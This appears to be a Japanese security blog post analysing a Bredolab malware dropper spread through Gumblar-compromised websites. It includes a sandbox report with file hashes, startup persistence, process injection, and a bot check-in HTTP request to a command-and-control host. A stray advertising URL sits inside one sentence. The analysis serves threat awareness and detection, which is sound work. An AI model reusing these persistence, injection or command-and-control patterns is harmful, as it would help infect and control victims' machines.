改ざん被害サイト経由で感染者を増やし続けているBredolabウイルス (srvklw32.exe)


 Comodo Instant Malware Analysisの解析結果より”Bredolab”ウイルスのドロッパー(36,352バイト)。自分自身を「srvklw32.exe」としてWindowsのスタートアップに登録し感染。


 検体の収集先は、いわゆるガンブラー(8080タイプ)による改ざんを受けた日本の正規サイトに挿入されてる不正なJavaScriptコード。


 Bredolabウイルスはさまざまなウイルスをダウンロードしてきて感染させる機能をもち、Windowsパソコンhttp://atq.ad.valuecommerce.com/servlet/atq/gifbanner?sid=2219441&pid=877212733&vcptn=geoc%2Fp%2FxfyEHKJf5d1rq45IWF5dの乗っ取りを行なうことができる。ホームページのアカウント情報(パスワード)の搾取(FTPクライアントソフトの設定奪取、FTP接続の通信監視)、ボットネットマシン化、迷惑メール配信マシン化。。。


 現在乗っ取ったパソコンを使って配信された迷惑メールがいっぱい・・・ (偽Amazon.com、インチキ薬屋のCanadian Pharmacy、偽ネット銀行などなど)



• File Info
Name Value
Size 36352
MD5 df9836b5eb36a1b9b0859d193cce6129
SHA1 52b9079814d788dbe88a09736e4161f31a61c2bc
SHA256 5a772c872619341b1dd8b1c1de1bdfa5465ca36b8a3303b708a1964b99d50e40
Process Exited


• Values Created
Name Type Size Value
LM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations REG_MULTI_SZ 140 "\??\C:\DOCUME~1\User\LOCALS~1\Temp\~TM6.tmp"


• Files Created
Name Size Last Write Time Creation Time Last Access Time Attr
C:\Documents and Settings\User\Application Data\avdrn.dat 4 2009.01.12 14:48:00.453 2009.01.12 14:48:00.328 2009.01.12 14:48:00.328 0x20
C:\Documents and Settings\User\Local Settings\Temp\~TM6.tmp 36352 2009.01.12 14:47:53.390 2009.01.12 14:47:36.750 2009.01.12 14:47:36.750 0x20
C:\Documents and Settings\User\Start Menu\Programs\Startup\srvklw32.exe 36352 2007.07.27 12:00:00.000 2007.07.27 12:00:00.000 2008.08.01 06:08:41.953 0x5


• Threads Created
PId Process Name TId Start Start Mem Win32 Start Win32 Start Mem
0x344 svchost.exe 0x170 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE
0x73c explorer.exe 0x36c 0x7c810856 MEM_IMAGE 0xd34ca8 MEM_PRIVATE


• Windows Api Calls
PId Image Name Address Function ( Parameters ) | Return Value
0x358 C:\TEST\sample.exe 0x4014e4 MoveFileExA(lpExistingFileName: "C:\TEST\sample.exe", lpNewFileName: "C:\DOCUME~1\User\LOCALS~1\Temp\~TM6.tmp", dwFlags: 0x1)|0x1
0x358 C:\TEST\sample.exe 0x401508 MoveFileExA(lpExistingFileName: "C:\TEST\sample.exe", lpNewFileName: "(null)", dwFlags: 0x4)|0x1


• DNS Queries
DNS Query Text
eyesong.ru IN A +


• HTTP Queries
HTTP Query Text
eyesong.ru GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=4293530751 HTTP/1.1


• Verdict
Auto Analysis Verdict
Suspicious++


• Description
Suspicious Actions Detected
Copies self to other locations
Deletes self
Injects code into other processes


ガンブラー対策・最新情報 (Gumblarウイルス)
マルウェア捕獲支援ツール Malzilla
ウェブ改ざん追跡支援ツール MDecoder